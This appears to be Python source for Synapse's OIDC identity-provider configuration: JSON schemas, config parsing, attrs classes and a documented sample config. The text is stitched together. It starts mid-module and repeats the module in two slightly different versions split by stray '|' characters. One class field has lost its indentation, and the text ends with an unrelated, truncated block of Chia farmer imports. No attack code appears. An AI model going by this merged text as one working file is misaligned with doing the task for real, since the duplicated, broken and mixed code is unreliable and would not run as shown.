# jsonschema definition of the configuration settings for an oidc identity provider
OIDC_PROVIDER_CONFIG_SCHEMA = {
    "type": "object",
    "required": ["issuer", "client_id"],
    "properties": {
        "idp_id": {
            "type": "string",
            "minLength": 1,
            # MSC2858 allows a maxlen of 255, but we prefix with "oidc-"
            "maxLength": 250,
            "pattern": "^[A-Za-z0-9._~-]+$",
        },
        "idp_name": {"type": "string"},
        "idp_icon": {"type": "string"},
        "idp_brand": {
            "type": "string",
            "minLength": 1,
            "maxLength": 255,
            "pattern": "^[a-z][a-z0-9_.-]*$",
        },
        "discover": {"type": "boolean"},
        "issuer": {"type": "string"},
        "client_id": {"type": "string"},
        "client_secret": {"type": "string"},
        "client_secret_jwt_key": {
            "type": "object",
            "required": ["jwt_header"],
            # exactly one of "key" / "key_file" must be given
            "oneOf": [
                {"required": ["key"]},
                {"required": ["key_file"]},
            ],
            "properties": {
                "key": {"type": "string"},
                "key_file": {"type": "string"},
                "jwt_header": {
                    "type": "object",
                    "required": ["alg"],
                    "properties": {
                        "alg": {"type": "string"},
                    },
                    "additionalProperties": {"type": "string"},
                },
                "jwt_payload": {
                    "type": "object",
                    "additionalProperties": {"type": "string"},
                },
            },
        },
        "client_auth_method": {
            "type": "string",
            # the following list is the same as the keys of
            # authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it
            # to avoid importing authlib here.
            "enum": ["client_secret_basic", "client_secret_post", "none"],
        },
        "scopes": {"type": "array", "items": {"type": "string"}},
        "authorization_endpoint": {"type": "string"},
        "token_endpoint": {"type": "string"},
        "userinfo_endpoint": {"type": "string"},
        "jwks_uri": {"type": "string"},
        "skip_verification": {"type": "boolean"},
        "user_profile_method": {
            "type": "string",
            "enum": ["auto", "userinfo_endpoint"],
        },
        "allow_existing_users": {"type": "boolean"},
        "user_mapping_provider": {"type": ["object", "null"]},
        "attribute_requirements": {
            "type": "array",
            "items": SsoAttributeRequirement.JSON_SCHEMA,
        },
    },
}

# the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name
OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = {
    "allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}]
}

# the `oidc_providers` list can either be None (as it is in the default config), or
# a list of provider configs, each of which requires an explicit ID and name.
OIDC_PROVIDER_LIST_SCHEMA = {
    "oneOf": [
        {"type": "null"},
        {"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA},
    ]
}

# the `oidc_config` setting can either be None (which it used to be in the default
# config), or an object. If an object, it is ignored unless it has an "enabled: True"
# property.
#
# It's *possible* to represent this with jsonschema, but the resultant errors aren't
# particularly clear, so we just check for either an object or a null here, and do
# additional checks in the code.
OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]}

# the top-level schema can contain an "oidc_config" and/or an "oidc_providers".
MAIN_CONFIG_SCHEMA = {
    "type": "object",
    "properties": {
        "oidc_config": OIDC_CONFIG_SCHEMA,
        "oidc_providers": OIDC_PROVIDER_LIST_SCHEMA,
    },
}
def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]:
    """Extract and parse the OIDC provider configs from the config dict.

    The configuration may contain either a single `oidc_config` object with an
    `enabled: True` property, or a list of provider configurations under
    `oidc_providers`, *or both*.

    Returns a generator which yields the OidcProviderConfig objects.
    """
    validate_config(MAIN_CONFIG_SCHEMA, config, ())

    providers = config.get("oidc_providers") or []
    for index, provider in enumerate(providers):
        provider_path = ("oidc_providers", "<item %i>" % (index,))
        yield _parse_oidc_config_dict(provider, provider_path)

    # for backwards-compatibility, it is also possible to provide a single
    # "oidc_config" object with an "enabled: True" property.
    legacy_config = config.get("oidc_config")
    if not legacy_config or not legacy_config.get("enabled", False):
        return

    # MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that
    # it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on
    # OIDC_CONFIG_SCHEMA above), so now we need to validate it.
    validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, legacy_config, ("oidc_config",))
    yield _parse_oidc_config_dict(legacy_config, ("oidc_config",))
def _parse_oidc_config_dict(
    oidc_config: JsonDict, config_path: Tuple[str, ...]
) -> "OidcProviderConfig":
    """Take the configuration dict and parse it into an OidcProviderConfig

    Args:
        oidc_config: the config dict for a single provider (already validated
            against OIDC_PROVIDER_CONFIG_SCHEMA by the caller).
        config_path: the path to this dict within the root config, used to
            build error messages.

    Raises:
        ConfigError if the configuration is malformed.
    """
    # NOTE: `setdefault` mutates the caller-supplied dict in place.
    ump_config = oidc_config.get("user_mapping_provider", {})
    ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER)
    # transparently accept the pre-rename module path
    if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER:
        ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER
    ump_config.setdefault("config", {})

    (
        user_mapping_provider_class,
        user_mapping_provider_config,
    ) = load_module(ump_config, config_path + ("user_mapping_provider",))

    # Ensure loaded user mapping module has defined all necessary methods
    required_methods = [
        "get_remote_user_id",
        "map_user_attributes",
    ]
    missing_methods = [
        method
        for method in required_methods
        if not hasattr(user_mapping_provider_class, method)
    ]
    if missing_methods:
        raise ConfigError(
            "Class %s is missing required "
            "methods: %s"
            % (
                user_mapping_provider_class,
                ", ".join(missing_methods),
            ),
            config_path + ("user_mapping_provider", "module"),
        )

    idp_id = oidc_config.get("idp_id", "oidc")

    # prefix the given IDP with a prefix specific to the SSO mechanism, to avoid
    # clashes with other mechs (such as SAML, CAS).
    #
    # We allow "oidc" as an exception so that people migrating from old-style
    # "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to
    # a new-style "oidc_providers" entry without changing the idp_id for their provider
    # (and thereby invalidating their user_external_ids data).
    if idp_id != "oidc":
        idp_id = "oidc-" + idp_id

    # MSC2858 also specifies that the idp_icon must be a valid MXC uri
    idp_icon = oidc_config.get("idp_icon")
    if idp_icon is not None:
        try:
            parse_and_validate_mxc_uri(idp_icon)
        except ValueError as e:
            raise ConfigError(
                "idp_icon must be a valid MXC URI", config_path + ("idp_icon",)
            ) from e

    client_secret_jwt_key_config = oidc_config.get("client_secret_jwt_key")
    client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None
    if client_secret_jwt_key_config is not None:
        # the schema guarantees exactly one of "key" / "key_file" is present
        keyfile = client_secret_jwt_key_config.get("key_file")
        if keyfile:
            key = read_file(keyfile, config_path + ("client_secret_jwt_key",))
        else:
            key = client_secret_jwt_key_config["key"]
        client_secret_jwt_key = OidcProviderClientSecretJwtKey(
            key=key,
            jwt_header=client_secret_jwt_key_config["jwt_header"],
            jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}),
        )

    # parse attribute_requirements from config (list of dicts) into a list of SsoAttributeRequirement
    attribute_requirements = [
        SsoAttributeRequirement(**x)
        for x in oidc_config.get("attribute_requirements", [])
    ]

    return OidcProviderConfig(
        idp_id=idp_id,
        idp_name=oidc_config.get("idp_name", "OIDC"),
        idp_icon=idp_icon,
        idp_brand=oidc_config.get("idp_brand"),
        discover=oidc_config.get("discover", True),
        issuer=oidc_config["issuer"],
        client_id=oidc_config["client_id"],
        client_secret=oidc_config.get("client_secret"),
        client_secret_jwt_key=client_secret_jwt_key,
        client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"),
        scopes=oidc_config.get("scopes", ["openid"]),
        authorization_endpoint=oidc_config.get("authorization_endpoint"),
        token_endpoint=oidc_config.get("token_endpoint"),
        userinfo_endpoint=oidc_config.get("userinfo_endpoint"),
        jwks_uri=oidc_config.get("jwks_uri"),
        skip_verification=oidc_config.get("skip_verification", False),
        user_profile_method=oidc_config.get("user_profile_method", "auto"),
        allow_existing_users=oidc_config.get("allow_existing_users", False),
        user_mapping_provider_class=user_mapping_provider_class,
        user_mapping_provider_config=user_mapping_provider_config,
        attribute_requirements=attribute_requirements,
    )
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderClientSecretJwtKey:
    """Settings for building a JWT to use as an OAuth2 client secret.

    Parsed from the `client_secret_jwt_key` section of a provider config.
    """

    # a pem-encoded signing key
    key: str

    # properties to include in the JWT header
    jwt_header: Mapping[str, str]

    # properties to include in the JWT payload.
    jwt_payload: Mapping[str, str]
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderConfig:
    """Parsed configuration for a single OIDC identity provider.

    Instances are built by `_parse_oidc_config_dict`, which applies the
    defaults and validation; fields here are stored as-parsed.
    """

    # a unique identifier for this identity provider. Used in the 'user_external_ids'
    # table, as well as the query/path parameter used in the login protocol.
    idp_id: str

    # user-facing name for this identity provider.
    idp_name: str

    # Optional MXC URI for icon for this IdP.
    idp_icon: Optional[str]

    # Optional brand identifier for this IdP.
    idp_brand: Optional[str]

    # whether the OIDC discovery mechanism is used to discover endpoints
    discover: bool

    # the OIDC issuer. Used to validate tokens and (if discovery is enabled) to
    # discover the provider's endpoints.
    issuer: str

    # oauth2 client id to use
    client_id: str

    # oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate
    # a secret.
    client_secret: Optional[str]

    # key to use to construct a JWT to use as a client secret. May be `None` if
    # `client_secret` is set.
    client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey]

    # auth method to use when exchanging the token.
    # Valid values are 'client_secret_basic', 'client_secret_post' and
    # 'none'.
    client_auth_method: str

    # list of scopes to request
    scopes: Collection[str]

    # the oauth2 authorization endpoint. Required if discovery is disabled.
    authorization_endpoint: Optional[str]

    # the oauth2 token endpoint. Required if discovery is disabled.
    token_endpoint: Optional[str]

    # the OIDC userinfo endpoint. Required if discovery is disabled and the
    # "openid" scope is not requested.
    userinfo_endpoint: Optional[str]

    # URI where to fetch the JWKS. Required if discovery is disabled and the
    # "openid" scope is used.
    jwks_uri: Optional[str]

    # Whether to skip metadata verification
    skip_verification: bool

    # Whether to fetch the user profile from the userinfo endpoint. Valid
    # values are: "auto" or "userinfo_endpoint".
    user_profile_method: str

    # whether to allow a user logging in via OIDC to match a pre-existing account
    # instead of failing
    allow_existing_users: bool

    # the class of the user mapping provider
    user_mapping_provider_class: Type

    # the config of the user mapping provider
    user_mapping_provider_config: Any

    # required attributes to require in userinfo to allow login/registration
attribute_requirements: List[SsoAttributeRequirement]
| # Copyright 2020 Quentin Gliech
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import Counter
from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type
import attr
from synapse.config._util import validate_config
from synapse.config.sso import SsoAttributeRequirement
from synapse.types import JsonDict
from synapse.util.module_loader import load_module
from synapse.util.stringutils import parse_and_validate_mxc_uri
from ..util.check_dependencies import DependencyException, check_requirements
from ._base import Config, ConfigError, read_file
# Mapping provider used when a provider config does not name one explicitly.
DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider"
# The module that JinjaOidcMappingProvider is in was renamed, we want to
# transparently handle both the same.
LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider"
class OIDCConfig(Config):
    """Parses the `oidc_providers` (and legacy `oidc_config`) settings."""

    section = "oidc"

    def read_config(self, config, **kwargs) -> None:
        """Parse the OIDC provider configs out of ``config``.

        Sets ``self.oidc_providers`` (a tuple of OidcProviderConfig) and, when
        any provider is configured, ``self.oidc_callback_url``.

        Raises:
            ConfigError: if the optional OIDC dependencies are missing, or if
                two providers end up with the same idp_id.
        """
        self.oidc_providers = tuple(_parse_oidc_provider_configs(config))
        if not self.oidc_providers:
            return

        try:
            check_requirements("oidc")
        except DependencyException as e:
            raise ConfigError(
                e.message  # noqa: B306, DependencyException.message is a property
            ) from e

        # check we don't have any duplicate idp_ids now. (The SSO handler will also
        # check for duplicates when the REST listeners get registered, but that happens
        # after synapse has forked so doesn't give nice errors.)
        c = Counter([i.idp_id for i in self.oidc_providers])
        for idp_id, count in c.items():
            if count > 1:
                raise ConfigError(
                    "Multiple OIDC providers have the idp_id %r." % idp_id
                )

        public_baseurl = self.root.server.public_baseurl
        self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback"

    @property
    def oidc_enabled(self) -> bool:
        # OIDC is enabled if we have a provider
        return bool(self.oidc_providers)

    def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str:
        """Return the sample config text for the oidc section.

        NOTE: the sample is passed through `.format()`, hence the quadrupled
        braces in the Jinja2 examples below (they render as doubled braces).
        """
        return """\
# List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration
# and login.
#
# Options for each entry include:
#
# idp_id: a unique identifier for this identity provider. Used internally
# by Synapse; should be a single word such as 'github'.
#
# Note that, if this is changed, users authenticating via that provider
# will no longer be recognised as the same user!
#
# (Use "oidc" here if you are migrating from an old "oidc_config"
# configuration.)
#
# idp_name: A user-facing name for this identity provider, which is used to
# offer the user a choice of login mechanisms.
#
# idp_icon: An optional icon for this identity provider, which is presented
# by clients and Synapse's own IdP picker page. If given, must be an
# MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to
# obtain such an MXC URI is to upload an image to an (unencrypted) room
# and then copy the "url" from the source of the event.)
#
# idp_brand: An optional brand for this identity provider, allowing clients
# to style the login flow according to the identity provider in question.
# See the spec for possible options here.
#
# discover: set to 'false' to disable the use of the OIDC discovery mechanism
# to discover endpoints. Defaults to true.
#
# issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery
# is enabled) to discover the provider's endpoints.
#
# client_id: Required. oauth2 client id to use.
#
# client_secret: oauth2 client secret to use. May be omitted if
# client_secret_jwt_key is given, or if client_auth_method is 'none'.
#
# client_secret_jwt_key: Alternative to client_secret: details of a key used
# to create a JSON Web Token to be used as an OAuth2 client secret. If
# given, must be a dictionary with the following properties:
#
# key: a pem-encoded signing key. Must be a suitable key for the
# algorithm specified. Required unless 'key_file' is given.
#
# key_file: the path to file containing a pem-encoded signing key file.
# Required unless 'key' is given.
#
# jwt_header: a dictionary giving properties to include in the JWT
# header. Must include the key 'alg', giving the algorithm used to
# sign the JWT, such as "ES256", using the JWA identifiers in
# RFC7518.
#
# jwt_payload: an optional dictionary giving properties to include in
# the JWT payload. Normally this should include an 'iss' key.
#
# client_auth_method: auth method to use when exchanging the token. Valid
# values are 'client_secret_basic' (default), 'client_secret_post' and
# 'none'.
#
# scopes: list of scopes to request. This should normally include the "openid"
# scope. Defaults to ["openid"].
#
# authorization_endpoint: the oauth2 authorization endpoint. Required if
# provider discovery is disabled.
#
# token_endpoint: the oauth2 token endpoint. Required if provider discovery is
# disabled.
#
# userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is
# disabled and the 'openid' scope is not requested.
#
# jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and
# the 'openid' scope is used.
#
# skip_verification: set to 'true' to skip metadata verification. Use this if
# you are connecting to a provider that is not OpenID Connect compliant.
# Defaults to false. Avoid this in production.
#
# user_profile_method: Whether to fetch the user profile from the userinfo
# endpoint, or to rely on the data returned in the id_token from the
# token_endpoint.
#
# Valid values are: 'auto' or 'userinfo_endpoint'.
#
# Defaults to 'auto', which uses the userinfo endpoint if 'openid' is
# not included in 'scopes'. Set to 'userinfo_endpoint' to always use the
# userinfo endpoint.
#
# allow_existing_users: set to 'true' to allow a user logging in via OIDC to
# match a pre-existing account instead of failing. This could be used if
# switching from password logins to OIDC. Defaults to false.
#
# user_mapping_provider: Configuration for how attributes returned from a OIDC
# provider are mapped onto a matrix user. This setting has the following
# sub-properties:
#
# module: The class name of a custom mapping module. Default is
# {mapping_provider!r}.
# See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers
# for information on implementing a custom mapping provider.
#
# config: Configuration for the mapping provider module. This section will
# be passed as a Python dictionary to the user mapping provider
# module's `parse_config` method.
#
# For the default provider, the following settings are available:
#
# subject_claim: name of the claim containing a unique identifier
# for the user. Defaults to 'sub', which OpenID Connect
# compliant providers should provide.
#
# localpart_template: Jinja2 template for the localpart of the MXID.
# If this is not set, the user will be prompted to choose their
# own username (see 'sso_auth_account_details.html' in the 'sso'
# section of this file).
#
# display_name_template: Jinja2 template for the display name to set
# on first login. If unset, no displayname will be set.
#
# email_template: Jinja2 template for the email address of the user.
# If unset, no email address will be added to the account.
#
# extra_attributes: a map of Jinja2 templates for extra attributes
# to send back to the client during login.
# Note that these are non-standard and clients will ignore them
# without modifications.
#
# When rendering, the Jinja2 templates are given a 'user' variable,
# which is set to the claims returned by the UserInfo Endpoint and/or
# in the ID Token.
#
# It is possible to configure Synapse to only allow logins if certain attributes
# match particular values in the OIDC userinfo. The requirements can be listed under
# `attribute_requirements` as shown below. All of the listed attributes must
# match for the login to be permitted. Additional attributes can be added to
# userinfo by expanding the `scopes` section of the OIDC config to retrieve
# additional information from the OIDC provider.
#
# If the OIDC claim is a list, then the attribute must match any value in the list.
# Otherwise, it must exactly match the value of the claim. Using the example
# below, the `family_name` claim MUST be "Stephensson", but the `groups`
# claim MUST contain "admin".
#
# attribute_requirements:
# - attribute: family_name
# value: "Stephensson"
# - attribute: groups
# value: "admin"
#
# See https://matrix-org.github.io/synapse/latest/openid.html
# for information on how to configure these options.
#
# For backwards compatibility, it is also possible to configure a single OIDC
# provider via an 'oidc_config' setting. This is now deprecated and admins are
# advised to migrate to the 'oidc_providers' format. (When doing that migration,
# use 'oidc' for the idp_id to ensure that existing users continue to be
# recognised.)
#
oidc_providers:
# Generic example
#
#- idp_id: my_idp
# idp_name: "My OpenID provider"
# idp_icon: "mxc://example.com/mediaid"
# discover: false
# issuer: "https://accounts.example.com/"
# client_id: "provided-by-your-issuer"
# client_secret: "provided-by-your-issuer"
# client_auth_method: client_secret_post
# scopes: ["openid", "profile"]
# authorization_endpoint: "https://accounts.example.com/oauth2/auth"
# token_endpoint: "https://accounts.example.com/oauth2/token"
# userinfo_endpoint: "https://accounts.example.com/userinfo"
# jwks_uri: "https://accounts.example.com/.well-known/jwks.json"
# skip_verification: true
# user_mapping_provider:
# config:
# subject_claim: "id"
# localpart_template: "{{{{ user.login }}}}"
# display_name_template: "{{{{ user.name }}}}"
# email_template: "{{{{ user.email }}}}"
# attribute_requirements:
# - attribute: userGroup
# value: "synapseUsers"
""".format(
            mapping_provider=DEFAULT_USER_MAPPING_PROVIDER
        )
# jsonschema definition of the configuration settings for an oidc identity provider
OIDC_PROVIDER_CONFIG_SCHEMA = {
    "type": "object",
    "required": ["issuer", "client_id"],
    "properties": {
        "idp_id": {
            "type": "string",
            "minLength": 1,
            # MSC2858 allows a maxlen of 255, but we prefix with "oidc-"
            "maxLength": 250,
            "pattern": "^[A-Za-z0-9._~-]+$",
        },
        "idp_name": {"type": "string"},
        "idp_icon": {"type": "string"},
        "idp_brand": {
            "type": "string",
            "minLength": 1,
            "maxLength": 255,
            "pattern": "^[a-z][a-z0-9_.-]*$",
        },
        "discover": {"type": "boolean"},
        "issuer": {"type": "string"},
        "client_id": {"type": "string"},
        "client_secret": {"type": "string"},
        "client_secret_jwt_key": {
            "type": "object",
            "required": ["jwt_header"],
            # exactly one of "key" / "key_file" must be given
            "oneOf": [
                {"required": ["key"]},
                {"required": ["key_file"]},
            ],
            "properties": {
                "key": {"type": "string"},
                "key_file": {"type": "string"},
                "jwt_header": {
                    "type": "object",
                    "required": ["alg"],
                    "properties": {
                        "alg": {"type": "string"},
                    },
                    "additionalProperties": {"type": "string"},
                },
                "jwt_payload": {
                    "type": "object",
                    "additionalProperties": {"type": "string"},
                },
            },
        },
        "client_auth_method": {
            "type": "string",
            # the following list is the same as the keys of
            # authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it
            # to avoid importing authlib here.
            "enum": ["client_secret_basic", "client_secret_post", "none"],
        },
        "scopes": {"type": "array", "items": {"type": "string"}},
        "authorization_endpoint": {"type": "string"},
        "token_endpoint": {"type": "string"},
        "userinfo_endpoint": {"type": "string"},
        "jwks_uri": {"type": "string"},
        "skip_verification": {"type": "boolean"},
        "user_profile_method": {
            "type": "string",
            "enum": ["auto", "userinfo_endpoint"],
        },
        "allow_existing_users": {"type": "boolean"},
        "user_mapping_provider": {"type": ["object", "null"]},
        "attribute_requirements": {
            "type": "array",
            "items": SsoAttributeRequirement.JSON_SCHEMA,
        },
    },
}

# the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name
OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = {
    "allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}]
}

# the `oidc_providers` list can either be None (as it is in the default config), or
# a list of provider configs, each of which requires an explicit ID and name.
OIDC_PROVIDER_LIST_SCHEMA = {
    "oneOf": [
        {"type": "null"},
        {"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA},
    ]
}

# the `oidc_config` setting can either be None (which it used to be in the default
# config), or an object. If an object, it is ignored unless it has an "enabled: True"
# property.
#
# It's *possible* to represent this with jsonschema, but the resultant errors aren't
# particularly clear, so we just check for either an object or a null here, and do
# additional checks in the code.
OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]}

# the top-level schema can contain an "oidc_config" and/or an "oidc_providers".
MAIN_CONFIG_SCHEMA = {
    "type": "object",
    "properties": {
        "oidc_config": OIDC_CONFIG_SCHEMA,
        "oidc_providers": OIDC_PROVIDER_LIST_SCHEMA,
    },
}
def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]:
    """Extract and parse the OIDC provider configs from the config dict.

    The configuration may contain either a single `oidc_config` object with an
    `enabled: True` property, or a list of provider configurations under
    `oidc_providers`, *or both*.

    Returns a generator which yields the OidcProviderConfig objects.
    """
    validate_config(MAIN_CONFIG_SCHEMA, config, ())

    providers = config.get("oidc_providers") or []
    for index, provider in enumerate(providers):
        yield _parse_oidc_config_dict(provider, ("oidc_providers", "<item %i>" % (index,)))

    # for backwards-compatibility, it is also possible to provide a single
    # "oidc_config" object with an "enabled: True" property.
    legacy_oidc = config.get("oidc_config")
    if legacy_oidc and legacy_oidc.get("enabled", False):
        # MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that
        # it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on
        # OIDC_CONFIG_SCHEMA above), so now we need to validate it.
        validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, legacy_oidc, ("oidc_config",))
        yield _parse_oidc_config_dict(legacy_oidc, ("oidc_config",))
def _parse_oidc_config_dict(
    oidc_config: JsonDict, config_path: Tuple[str, ...]
) -> "OidcProviderConfig":
    """Take the configuration dict and parse it into an OidcProviderConfig.

    Args:
        oidc_config: a dict matching OIDC_PROVIDER_CONFIG_SCHEMA.
        config_path: path to this part of the config, for error reporting.

    Raises:
        ConfigError if the configuration is malformed.
    """
    # The provider schema allows `user_mapping_provider` to be null as well as
    # absent; `or {}` covers both, where `.get(..., {})` would crash with an
    # AttributeError on an explicit null.
    ump_config = oidc_config.get("user_mapping_provider") or {}
    ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER)
    # silently upgrade the legacy module path to its current name
    if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER:
        ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER
    ump_config.setdefault("config", {})

    (
        user_mapping_provider_class,
        user_mapping_provider_config,
    ) = load_module(ump_config, config_path + ("user_mapping_provider",))

    # Ensure loaded user mapping module has defined all necessary methods
    required_methods = [
        "get_remote_user_id",
        "map_user_attributes",
    ]
    missing_methods = [
        method
        for method in required_methods
        if not hasattr(user_mapping_provider_class, method)
    ]
    if missing_methods:
        raise ConfigError(
            "Class %s is missing required "
            "methods: %s"
            % (
                user_mapping_provider_class,
                ", ".join(missing_methods),
            ),
            config_path + ("user_mapping_provider", "module"),
        )

    idp_id = oidc_config.get("idp_id", "oidc")

    # prefix the given IDP with a prefix specific to the SSO mechanism, to avoid
    # clashes with other mechs (such as SAML, CAS).
    #
    # We allow "oidc" as an exception so that people migrating from old-style
    # "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to
    # a new-style "oidc_providers" entry without changing the idp_id for their provider
    # (and thereby invalidating their user_external_ids data).
    if idp_id != "oidc":
        idp_id = "oidc-" + idp_id

    # MSC2858 also specifies that the idp_icon must be a valid MXC uri
    idp_icon = oidc_config.get("idp_icon")
    if idp_icon is not None:
        try:
            parse_and_validate_mxc_uri(idp_icon)
        except ValueError as e:
            raise ConfigError(
                "idp_icon must be a valid MXC URI", config_path + ("idp_icon",)
            ) from e

    client_secret_jwt_key_config = oidc_config.get("client_secret_jwt_key")
    client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None
    if client_secret_jwt_key_config is not None:
        # the key can be given either inline ("key") or as a file path ("key_file")
        keyfile = client_secret_jwt_key_config.get("key_file")
        if keyfile:
            key = read_file(keyfile, config_path + ("client_secret_jwt_key",))
        else:
            key = client_secret_jwt_key_config["key"]
        client_secret_jwt_key = OidcProviderClientSecretJwtKey(
            key=key,
            jwt_header=client_secret_jwt_key_config["jwt_header"],
            jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}),
        )

    # parse attribute_requirements from config (list of dicts) into a list of
    # SsoAttributeRequirement
    attribute_requirements = [
        SsoAttributeRequirement(**x)
        for x in oidc_config.get("attribute_requirements", [])
    ]

    return OidcProviderConfig(
        idp_id=idp_id,
        idp_name=oidc_config.get("idp_name", "OIDC"),
        idp_icon=idp_icon,
        idp_brand=oidc_config.get("idp_brand"),
        discover=oidc_config.get("discover", True),
        issuer=oidc_config["issuer"],
        client_id=oidc_config["client_id"],
        client_secret=oidc_config.get("client_secret"),
        client_secret_jwt_key=client_secret_jwt_key,
        client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"),
        scopes=oidc_config.get("scopes", ["openid"]),
        authorization_endpoint=oidc_config.get("authorization_endpoint"),
        token_endpoint=oidc_config.get("token_endpoint"),
        userinfo_endpoint=oidc_config.get("userinfo_endpoint"),
        jwks_uri=oidc_config.get("jwks_uri"),
        skip_verification=oidc_config.get("skip_verification", False),
        user_profile_method=oidc_config.get("user_profile_method", "auto"),
        allow_existing_users=oidc_config.get("allow_existing_users", False),
        user_mapping_provider_class=user_mapping_provider_class,
        user_mapping_provider_config=user_mapping_provider_config,
        attribute_requirements=attribute_requirements,
    )
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderClientSecretJwtKey:
    """Settings for constructing a JWT to use in place of a static client secret."""

    # a pem-encoded signing key
    key: str

    # properties to include in the JWT header
    jwt_header: Mapping[str, str]

    # properties to include in the JWT payload.
    jwt_payload: Mapping[str, str]
@attr.s(slots=True, frozen=True, auto_attribs=True)
class OidcProviderConfig:
    """Parsed configuration for a single OIDC identity provider."""

    # a unique identifier for this identity provider. Used in the 'user_external_ids'
    # table, as well as the query/path parameter used in the login protocol.
    idp_id: str

    # user-facing name for this identity provider.
    idp_name: str

    # Optional MXC URI for icon for this IdP.
    idp_icon: Optional[str]

    # Optional brand identifier for this IdP.
    idp_brand: Optional[str]

    # whether the OIDC discovery mechanism is used to discover endpoints
    discover: bool

    # the OIDC issuer. Used to validate tokens and (if discovery is enabled) to
    # discover the provider's endpoints.
    issuer: str

    # oauth2 client id to use
    client_id: str

    # oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate
    # a secret.
    client_secret: Optional[str]

    # key to use to construct a JWT to use as a client secret. May be `None` if
    # `client_secret` is set.
    client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey]

    # auth method to use when exchanging the token.
    # Valid values are 'client_secret_basic', 'client_secret_post' and
    # 'none'.
    client_auth_method: str

    # list of scopes to request
    scopes: Collection[str]

    # the oauth2 authorization endpoint. Required if discovery is disabled.
    authorization_endpoint: Optional[str]

    # the oauth2 token endpoint. Required if discovery is disabled.
    token_endpoint: Optional[str]

    # the OIDC userinfo endpoint. Required if discovery is disabled and the
    # "openid" scope is not requested.
    userinfo_endpoint: Optional[str]

    # URI where to fetch the JWKS. Required if discovery is disabled and the
    # "openid" scope is used.
    jwks_uri: Optional[str]

    # Whether to skip metadata verification
    skip_verification: bool

    # Whether to fetch the user profile from the userinfo endpoint. Valid
    # values are: "auto" or "userinfo_endpoint".
    user_profile_method: str

    # whether to allow a user logging in via OIDC to match a pre-existing account
    # instead of failing
    allow_existing_users: bool

    # the class of the user mapping provider
    user_mapping_provider_class: Type

    # the config of the user mapping provider
    user_mapping_provider_config: Any

    # required attributes to require in userinfo to allow login/registration
    attribute_requirements: List[SsoAttributeRequirement]
|
import asyncio
import json
import logging
import time
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple
import traceback
import aiohttp
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
import chia.server.ws_connection as ws # lgtm [py/import-and-import-from]
from chia.consensus.coinbase import create_puzzlehash_for_pk
from chia.consensus.constants import ConsensusConstants
from chia.daemon.keychain_proxy import (
KeychainProxy,
KeychainProxyConnectionFailure,
connect_to_keychain_and_validate,
wrap_local_keychain,
)
from chia.plot_sync.receiver import Receiver
from chia.plot_sync.delta import Delta
from chia.pools.pool_config import PoolWalletConfig, load_pool_config, add_auth_key
from chia.protocols import farmer_protocol, harvester_protocol
from chia.protocols.pool_protocol import (
ErrorResponse,
